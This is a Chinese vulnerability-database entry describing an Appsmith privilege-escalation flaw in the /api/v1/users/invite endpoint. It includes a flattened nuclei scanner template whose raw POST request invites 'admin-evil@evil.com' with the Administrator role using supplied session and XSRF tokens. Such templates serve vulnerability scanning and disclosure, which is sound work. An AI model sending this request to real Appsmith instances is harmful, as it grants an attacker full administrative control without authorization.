漏洞信息 漏洞名称: Appsmith 权限提升漏洞
漏洞编号:
漏洞类型: 权限提升
漏洞等级: 高危
漏洞描述: Appsmith是一个开源的内部工具构建平台,允许开发者快速构建管理面板、CRUD应用和自定义工作流程。它广泛应用于企业内部,用于数据可视化和操作自动化。该漏洞存在于Appsmith的/api/v1/users/invite接口中,攻击者可以通过发送特制的POST请求,尝试邀请一个新用户并赋予其管理员权限。这暴露了访问控制机制的缺陷,即系统未能正确验证请求者的权限,导致权限提升。成功利用此漏洞的攻击者可以在未经授权的情况下获得管理员权限,从而完全控制Appsmith实例。此漏洞的利用需要有效的认证令牌,这意味着攻击者需要先获得一定的访问权限。尽管如此,一旦利用成功,攻击者可以执行任意操作,包括数据泄露、服务中断等,对企业内部安全构成严重威胁。
产品厂商: Appsmith
产品名称: Appsmith
来源: https://github.com/projectdiscovery/nuclei-templates/blob/0ae90e5259996697fd6f02b0ce37eea8a6927c2b/appsmith-privilege-escalation-attempt.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 id: appsmith-privilege-escalation-attemptinfo: name: Appsmith - Privilege Escalation via /users/invite author: saikir4n severity: high description: > Attempts to invite a user as Administrator using /api/v1/users/invite. If successful, it indicates broken access control. Requires valid authentication tokens to work. reference: - https:// rhinosecuritylabs.com/ research/ cve-202 4-5596 3-appsmith-rce/ tags: appsmith,authz,privilege-escalationrequests: - raw: - | POST /api/v1/users/invite HTTP/1.1 Host: {{Hostname}} Origin: http:// {{Hostname}} Referer: http:// {{Hostname}}/applications Content-Type: application/json X-XSRF-TOKEN: {{xsrf_token}} Cookie: XSRF-TOKEN= {{xsrf_token}}; SESSION = {{session_id}} Content-Length: 107 { "email" : "admin-evil@evil.com" , "usernames" : ["admin-evil" ], "roleNames" : ["Administrator" ] } attack: pitchfork payloads: xsrf_token: - REPLACE_XSRF_TOKEN session_id: - REPLACE_SESSION_ID matchers: - type: status status: - 200 - 201 matchers-condition: and